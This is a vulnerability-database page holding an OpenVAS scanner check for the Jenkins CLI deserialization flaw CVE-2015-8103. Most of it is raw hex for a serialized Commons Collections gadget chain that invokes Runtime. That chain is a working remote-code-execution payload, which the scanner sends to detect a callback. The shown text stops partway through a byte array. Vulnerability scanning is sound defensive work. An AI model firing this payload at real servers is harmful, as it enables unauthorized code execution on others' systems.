Lucene search
+L

Jenkins CLI RMI Java Deserialization Vulnerability (Nov 2015) - Active Check

🗓️ 22 Jul 2016 00:00:00Reported by Copyright (C) 2016 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 53 Views

Jenkins CLI RMI Java Deserialization Vulnerability (Nov 2015) - Active Check. Remote code execution vulnerability. Unsafe deserialization allows unauthenticated attackers to run arbitrary code on Jenkins master. Affects Jenkins main line before 1.638, Jenkins LTS before 1.625.2. Updates availabl

Related
Refs
Code
# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:jenkins:jenkins";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105820");
  script_version("2026-03-12T05:56:11+0000");
  script_tag(name:"last_modification", value:"2026-03-12 05:56:11 +0000 (Thu, 12 Mar 2026)");
  script_tag(name:"creation_date", value:"2016-07-22 12:45:35 +0200 (Fri, 22 Jul 2016)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2024-01-09 02:16:00 +0000 (Tue, 09 Jan 2024)");

  script_cve_id("CVE-2015-8103");

  script_name("Jenkins CLI RMI Java Deserialization Vulnerability (Nov 2015) - Active Check");

  script_tag(name:"qod_type", value:"remote_analysis");

  script_tag(name:"solution_type", value:"VendorFix");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_family("General");
  script_dependencies("gb_jenkins_consolidation.nasl", "os_detection.nasl");
  script_require_ports("Services/jenkins_cli", 50000);
  script_mandatory_keys("jenkins/jenkins_cli/tcp/detected");

  script_tag(name:"summary", value:"Jenkins is prone to a remote code execution (RCE)
  vulnerability.");

  script_tag(name:"vuldetect", value:"Two different methods are used:

  1. Sends a crafted serialized object and checks if the target is connecting back to the scanner
  host (Linux/Unix targets only).

  2. Sends a crafted serialized object and checks if the target is sending an ICMP Echo Request back
  to the scanner host.

  Notes:

  - For a successful detection of this flaw via the first method the target host needs to be able to
  reach the scanner host on a TCP port randomly generated during the runtime of the VT (currently in
  the range of 10000-32000).

  - For a successful detection of this flaw via the second method the scanner host needs to be able
  to directly receive ICMP Echo Requests (Type 8) from the target.

  - If the target is a Windows system constantly sending ICMP Echo requests to the scanner host
  (e.g. a Monitoring System) the second detection method might be not fully reliable. In this case
  please create an override for any result of this VT.");

  script_tag(name:"insight", value:"Unsafe deserialization allows unauthenticated remote attackers
  to run arbitrary code on the Jenkins master.");

  script_tag(name:"impact", value:"Successfully exploiting this issue allows attackers to execute
  arbitrary code in the context of the affected application.");

  script_tag(name:"affected", value:"Jenkins main line before 1.638, Jenkins LTS before 1.625.2.");

  script_tag(name:"solution", value:"Updates are available. Please see the references or vendor
  advisory for more information.");

  script_xref(name:"URL", value:"https://www.jenkins.io/security/advisory/2015-11-11/");
  script_xref(name:"URL", value:"https://www.jenkins.io/blog/2015/11/06/mitigating-unauthenticated-remote-code-execution-0-day-in-jenkins-cli/");
  script_xref(name:"URL", value:"https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/");
  script_xref(name:"URL", value:"https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py");
  script_xref(name:"URL", value:"https://seclists.org/oss-sec/2015/q4/241");
  script_xref(name:"URL", value:"https://web.archive.org/web/20210122210513/http://www.securityfocus.com/bid/77636");

  exit(0);
}

include("misc_func.inc");
include("host_details.inc");
include("os_func.inc");
include("dump.inc");
include("list_array_func.inc");
include("pcap_func.inc");

if( ! port = get_app_port( cpe:CPE, service:"jenkins_cli" ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

ownhostname = this_host_name();
ownip = this_host();
src_filter = pcap_src_ip_filter_from_hostnames();
dst_filter = string( "(dst host ", ownip, " or dst host ", ownhostname, ")" );

headers = raw_string(
  0x00, 0x14, 0x50, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x3a, 0x43, 0x4c, 0x49, 0x2d, 0x63, 0x6f, 0x6e, 0x6e, 0x65, 0x63, 0x74
);

payload_pre = raw_string(
  0x3c, 0x3d, 0x3d, 0x3d, 0x5b, 0x4a, 0x45, 0x4e, 0x4b, 0x49, 0x4e, 0x53, 0x20, 0x52, 0x45, 0x4d, 0x4f, 0x54, 0x49, 0x4e, 0x47, 0x20, 0x43, 0x41, 0x50, 0x41, 0x43, 0x49, 0x54, 0x59, 0x5d, 0x3d, 0x3d, 0x3d, 0x3e
);

ex_pre = raw_string(
  0xac, 0xed, 0x00, 0x05, 0x73, 0x72, 0x00, 0x32, 0x73, 0x75, 0x6e, 0x2e, 0x72, 0x65, 0x66, 0x6c,
  0x65, 0x63, 0x74, 0x2e, 0x61, 0x6e, 0x6e, 0x6f, 0x74, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2e, 0x41,
  0x6e, 0x6e, 0x6f, 0x74, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74,
  0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x55, 0xca, 0xf5, 0x0f, 0x15, 0xcb,
  0x7e, 0xa5, 0x02, 0x00, 0x02, 0x4c, 0x00, 0x0c, 0x6d, 0x65, 0x6d, 0x62, 0x65, 0x72, 0x56, 0x61,
  0x6c, 0x75, 0x65, 0x73, 0x74, 0x00, 0x0f, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x75, 0x74, 0x69,
  0x6c, 0x2f, 0x4d, 0x61, 0x70, 0x3b, 0x4c, 0x00, 0x04, 0x74, 0x79, 0x70, 0x65, 0x74, 0x00, 0x11,
  0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x43, 0x6c, 0x61, 0x73, 0x73,
  0x3b, 0x78, 0x70, 0x73, 0x7d, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0d, 0x6a, 0x61, 0x76, 0x61, 0x2e,
  0x75, 0x74, 0x69, 0x6c, 0x2e, 0x4d, 0x61, 0x70, 0x78, 0x72, 0x00, 0x17, 0x6a, 0x61, 0x76, 0x61,
  0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x72, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x2e, 0x50, 0x72,
  0x6f, 0x78, 0x79, 0xe1, 0x27, 0xda, 0x20, 0xcc, 0x10, 0x43, 0xcb, 0x02, 0x00, 0x01, 0x4c, 0x00,
  0x01, 0x68, 0x74, 0x00, 0x25, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f,
  0x72, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x2f, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74, 0x69,
  0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x3b, 0x78, 0x70, 0x73, 0x71, 0x00, 0x7e,
  0x00, 0x00, 0x73, 0x72, 0x00, 0x2a, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70, 0x61, 0x63, 0x68, 0x65,
  0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74,
  0x69, 0x6f, 0x6e, 0x73, 0x2e, 0x6d, 0x61, 0x70, 0x2e, 0x4c, 0x61, 0x7a, 0x79, 0x4d, 0x61, 0x70,
  0x6e, 0xe5, 0x94, 0x82, 0x9e, 0x79, 0x10, 0x94, 0x03, 0x00, 0x01, 0x4c, 0x00, 0x07, 0x66, 0x61,
  0x63, 0x74, 0x6f, 0x72, 0x79, 0x74, 0x00, 0x2c, 0x4c, 0x6f, 0x72, 0x67, 0x2f, 0x61, 0x70, 0x61,
  0x63, 0x68, 0x65, 0x2f, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2f, 0x63, 0x6f, 0x6c, 0x6c,
  0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x2f, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f, 0x72,
  0x6d, 0x65, 0x72, 0x3b, 0x78, 0x70, 0x73, 0x72, 0x00, 0x3a, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70,
  0x61, 0x63, 0x68, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c,
  0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x2e, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x6f, 0x72,
  0x73, 0x2e, 0x43, 0x68, 0x61, 0x69, 0x6e, 0x65, 0x64, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f,
  0x72, 0x6d, 0x65, 0x72, 0x30, 0xc7, 0x97, 0xec, 0x28, 0x7a, 0x97, 0x04, 0x02, 0x00, 0x01, 0x5b,
  0x00, 0x0d, 0x69, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f, 0x72, 0x6d, 0x65, 0x72, 0x73, 0x74,
  0x00, 0x2d, 0x5b, 0x4c, 0x6f, 0x72, 0x67, 0x2f, 0x61, 0x70, 0x61, 0x63, 0x68, 0x65, 0x2f, 0x63,
  0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2f, 0x63, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f,
  0x6e, 0x73, 0x2f, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f, 0x72, 0x6d, 0x65, 0x72, 0x3b, 0x78,
  0x70, 0x75, 0x72, 0x00, 0x2d, 0x5b, 0x4c, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70, 0x61, 0x63, 0x68,
  0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c, 0x6c, 0x65, 0x63,
  0x74, 0x69, 0x6f, 0x6e, 0x73, 0x2e, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f, 0x72, 0x6d, 0x65,
  0x72, 0x3b, 0xbd, 0x56, 0x2a, 0xf1, 0xd8, 0x34, 0x18, 0x99, 0x02, 0x00, 0x00, 0x78, 0x70, 0x00,
  0x00, 0x00, 0x05, 0x73, 0x72, 0x00, 0x3b, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70, 0x61, 0x63, 0x68,
  0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c, 0x6c, 0x65, 0x63,
  0x74, 0x69, 0x6f, 0x6e, 0x73, 0x2e, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x6f, 0x72, 0x73, 0x2e, 0x43,
  0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x74, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f, 0x72, 0x6d,
  0x65, 0x72, 0x58, 0x76, 0x90, 0x11, 0x41, 0x02, 0xb1, 0x94, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x09,
  0x69, 0x43, 0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e, 0x74, 0x74, 0x00, 0x12, 0x4c, 0x6a, 0x61, 0x76,
  0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3b, 0x78, 0x70,
  0x76, 0x72, 0x00, 0x11, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x52, 0x75,
  0x6e, 0x74, 0x69, 0x6d, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x78, 0x70, 0x73, 0x72, 0x00, 0x3a, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70, 0x61, 0x63, 0x68, 0x65,
  0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74,
  0x69, 0x6f, 0x6e, 0x73, 0x2e, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x6f, 0x72, 0x73, 0x2e, 0x49, 0x6e,
  0x76, 0x6f, 0x6b, 0x65, 0x72, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f, 0x72, 0x6d, 0x65, 0x72,
  0x87, 0xe8, 0xff, 0x6b, 0x7b, 0x7c, 0xce, 0x38, 0x02, 0x00, 0x03, 0x5b, 0x00, 0x05, 0x69, 0x41,
  0x72, 0x67, 0x73, 0x74, 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e,
  0x67, 0x2f, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3b, 0x4c, 0x00, 0x0b, 0x69, 0x4d, 0x65, 0x74,
  0x68, 0x6f, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x74, 0x00, 0x12, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f,
  0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x3b, 0x5b, 0x00, 0x0b, 0x69,
  0x50, 0x61, 0x72, 0x61, 0x6d, 0x54, 0x79, 0x70, 0x65, 0x73, 0x74, 0x00, 0x12, 0x5b, 0x4c, 0x6a,
  0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x3b, 0x78,
  0x70, 0x75, 0x72, 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67,
  0x2e, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3b, 0x90, 0xce, 0x58, 0x9f, 0x10, 0x73, 0x29, 0x6c,
  0x02, 0x00, 0x00, 0x78, 0x70, 0x00, 0x00, 0x00, 0x02, 0x74, 0x00, 0x0a, 0x67, 0x65, 0x74, 0x52,
  0x75, 0x6e, 0x74, 0x69, 0x6d, 0x65, 0x75, 0x72, 0x00, 0x12, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61,
  0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x3b, 0xab, 0x16, 0xd7, 0xae,
  0xcb, 0xcd, 0x5a, 0x99, 0x02, 0x00, 0x00, 0x78, 0x70, 0x00, 0x00, 0x00, 0x00, 0x74, 0x00, 0x09,
  0x67, 0x65, 0x74, 0x4d, 0x65, 0x74, 0x68, 0x6f, 0x64, 0x75, 0x71, 0x00, 0x7e, 0x00, 0x1e, 0x00,
  0x00, 0x00, 0x02, 0x76, 0x72, 0x00, 0x10, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67,
  0x2e, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0xa0, 0xf0, 0xa4, 0x38, 0x7a, 0x3b, 0xb3, 0x42, 0x02,
  0x00, 0x00, 0x78, 0x70, 0x76, 0x71, 0x00, 0x7e, 0x00, 0x1e, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x16,
  0x75, 0x71, 0x00, 0x7e, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x02, 0x70, 0x75, 0x71, 0x00, 0x7e, 0x00,
  0x1b, 0x00, 0x00, 0x00, 0x00, 0x74, 0x00, 0x06, 0x69, 0x6e, 0x76, 0x6f, 0x6b, 0x65, 0x75, 0x71,
  0x00, 0x7e, 0x00, 0x1e, 0x00, 0x00, 0x00, 0x02, 0x76, 0x72, 0x00, 0x10, 0x6a, 0x61, 0x76, 0x61,
  0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x78, 0x70, 0x76, 0x71, 0x00, 0x7e, 0x00, 0x1b, 0x73,
  0x71, 0x00, 0x7e, 0x00, 0x16, 0x75, 0x72, 0x00, 0x13, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2e,
  0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x3b, 0xad, 0xd2, 0x56, 0xe7,
  0xe9, 0x1d, 0x7b, 0x47, 0x02, 0x00, 0x00, 0x78, 0x70, 0x00, 0x00, 0x00, 0x01, 0x74, 0x00
);

payload_post = raw_string(
  0x00, 0x00, 0x00, 0x00, 0x11, 0x2d, 0xac, 0xed, 0x00, 0x05, 0x73, 0x72, 0x00, 0x1b, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x55, 0x73, 0x65, 0x72, 0x52,
  0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x03, 0x4c, 0x00, 0x10, 0x63, 0x6c, 0x61, 0x73, 0x73, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x50, 0x72, 0x6f, 0x78,
  0x79, 0x74, 0x00, 0x30, 0x4c, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2f, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2f, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x4c, 0x6f, 0x61,
  0x64, 0x65, 0x72, 0x24, 0x49, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x4c, 0x6f, 0x61, 0x64, 0x65, 0x72, 0x3b, 0x5b, 0x00, 0x07, 0x72, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x74, 0x00, 0x02, 0x5b, 0x42, 0x4c, 0x00, 0x08,
  0x74, 0x6f, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x74, 0x00, 0x12, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x53, 0x74, 0x72, 0x69, 0x6e, 0x67, 0x3b, 0x78, 0x72, 0x00, 0x17, 0x68, 0x75,
  0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x03, 0x49, 0x00, 0x02,
  0x69, 0x64, 0x49, 0x00, 0x08, 0x6c, 0x61, 0x73, 0x74, 0x49, 0x6f, 0x49, 0x64, 0x4c, 0x00, 0x08, 0x72, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x74, 0x00, 0x1a, 0x4c, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2f,
  0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2f, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x3b, 0x78, 0x72, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69,
  0x6e, 0x67, 0x2e, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x01, 0x4c, 0x00, 0x09, 0x63, 0x72, 0x65, 0x61, 0x74, 0x65, 0x64, 0x41, 0x74, 0x74, 0x00,
  0x15, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x45, 0x78, 0x63, 0x65, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x3b, 0x78, 0x70, 0x73, 0x72, 0x00, 0x1e, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e,
  0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x24, 0x53, 0x6f, 0x75, 0x72, 0x63, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x00, 0x01, 0x4c,
  0x00, 0x06, 0x74, 0x68, 0x69, 0x73, 0x24, 0x30, 0x74, 0x00, 0x19, 0x4c, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2f, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2f, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64,
  0x3b, 0x78, 0x72, 0x00, 0x13, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x45, 0x78, 0x63, 0x65, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0xd0, 0xfd, 0x1f, 0x3e, 0x1a, 0x3b, 0x1c, 0xc4, 0x02, 0x00, 0x00,
  0x78, 0x72, 0x00, 0x13, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x54, 0x68, 0x72, 0x6f, 0x77, 0x61, 0x62, 0x6c, 0x65, 0xd5, 0xc6, 0x35, 0x27, 0x39, 0x77, 0xb8, 0xcb, 0x03, 0x00, 0x04, 0x4c,
  0x00, 0x05, 0x63, 0x61, 0x75, 0x73, 0x65, 0x74, 0x00, 0x15, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x54, 0x68, 0x72, 0x6f, 0x77, 0x61, 0x62, 0x6c, 0x65, 0x3b, 0x4c, 0x00, 0x0d, 0x64,
  0x65, 0x74, 0x61, 0x69, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x71, 0x00, 0x7e, 0x00, 0x03, 0x5b, 0x00, 0x0a, 0x73, 0x74, 0x61, 0x63, 0x6b, 0x54, 0x72, 0x61, 0x63, 0x65, 0x74, 0x00, 0x1e, 0x5b, 0x4c,
  0x6a, 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x53, 0x74, 0x61, 0x63, 0x6b, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x3b, 0x4c, 0x00, 0x14, 0x73, 0x75, 0x70, 0x70,
  0x72, 0x65, 0x73, 0x73, 0x65, 0x64, 0x45, 0x78, 0x63, 0x65, 0x70, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x74, 0x00, 0x10, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x75, 0x74, 0x69, 0x6c, 0x2f, 0x4c, 0x69, 0x73, 0x74, 0x3b,
  0x78, 0x70, 0x71, 0x00, 0x7e, 0x00, 0x10, 0x70, 0x75, 0x72, 0x00, 0x1e, 0x5b, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x53, 0x74, 0x61, 0x63, 0x6b, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45,
  0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x3b, 0x02, 0x46, 0x2a, 0x3c, 0x3c, 0xfd, 0x22, 0x39, 0x02, 0x00, 0x00, 0x78, 0x70, 0x00, 0x00, 0x00, 0x0c, 0x73, 0x72, 0x00, 0x1b, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61,
  0x6e, 0x67, 0x2e, 0x53, 0x74, 0x61, 0x63, 0x6b, 0x54, 0x72, 0x61, 0x63, 0x65, 0x45, 0x6c, 0x65, 0x6d, 0x65, 0x6e, 0x74, 0x61, 0x09, 0xc5, 0x9a, 0x26, 0x36, 0xdd, 0x85, 0x02, 0x00, 0x04, 0x49, 0x00, 0x0a, 0x6c,
  0x69, 0x6e, 0x65, 0x4e, 0x75, 0x6d, 0x62, 0x65, 0x72, 0x4c, 0x00, 0x0e, 0x64, 0x65, 0x63, 0x6c, 0x61, 0x72, 0x69, 0x6e, 0x67, 0x43, 0x6c, 0x61, 0x73, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x03, 0x4c, 0x00, 0x08, 0x66,
  0x69, 0x6c, 0x65, 0x4e, 0x61, 0x6d, 0x65, 0x71, 0x00, 0x7e, 0x00, 0x03, 0x4c, 0x00, 0x0a, 0x6d, 0x65, 0x74, 0x68, 0x6f, 0x64, 0x4e, 0x61, 0x6d, 0x65, 0x71, 0x00, 0x7e, 0x00, 0x03, 0x78, 0x70, 0x00, 0x00, 0x00,
  0x43, 0x74, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x43, 0x6f, 0x6d, 0x6d, 0x61, 0x6e, 0x64, 0x74, 0x00, 0x0c, 0x43, 0x6f, 0x6d, 0x6d, 0x61,
  0x6e, 0x64, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x74, 0x00, 0x06, 0x3c, 0x69, 0x6e, 0x69, 0x74, 0x3e, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x32, 0x71, 0x00, 0x7e, 0x00, 0x15, 0x71, 0x00, 0x7e, 0x00,
  0x16, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0x63, 0x74, 0x00, 0x17, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e,
  0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x74, 0x00, 0x0c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00,
  0x00, 0x3c, 0x74, 0x00, 0x1b, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x55, 0x73, 0x65, 0x72, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x74, 0x00, 0x10,
  0x55, 0x73, 0x65, 0x72, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x71, 0x00, 0x7e, 0x00, 0x17, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x03, 0x08, 0x74, 0x00, 0x17, 0x68,
  0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69, 0x6e, 0x67, 0x2e, 0x43, 0x68, 0x61, 0x6e, 0x6e, 0x65, 0x6c, 0x74, 0x00, 0x0c, 0x43, 0x68, 0x61, 0x6e, 0x6e, 0x65, 0x6c, 0x2e, 0x6a, 0x61,
  0x76, 0x61, 0x74, 0x00, 0x04, 0x63, 0x61, 0x6c, 0x6c, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x13, 0x00, 0x00, 0x00, 0xfa, 0x74, 0x00, 0x27, 0x68, 0x75, 0x64, 0x73, 0x6f, 0x6e, 0x2e, 0x72, 0x65, 0x6d, 0x6f, 0x74, 0x69,
  0x6e, 0x67, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x74, 0x00, 0x1c, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65,
  0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c, 0x65, 0x72, 0x2e, 0x6a, 0x61, 0x76, 0x61, 0x74, 0x00, 0x06, 0x69, 0x6e, 0x76, 0x6f, 0x6b, 0x65, 0x73, 0x71, 0x00, 0x7e,
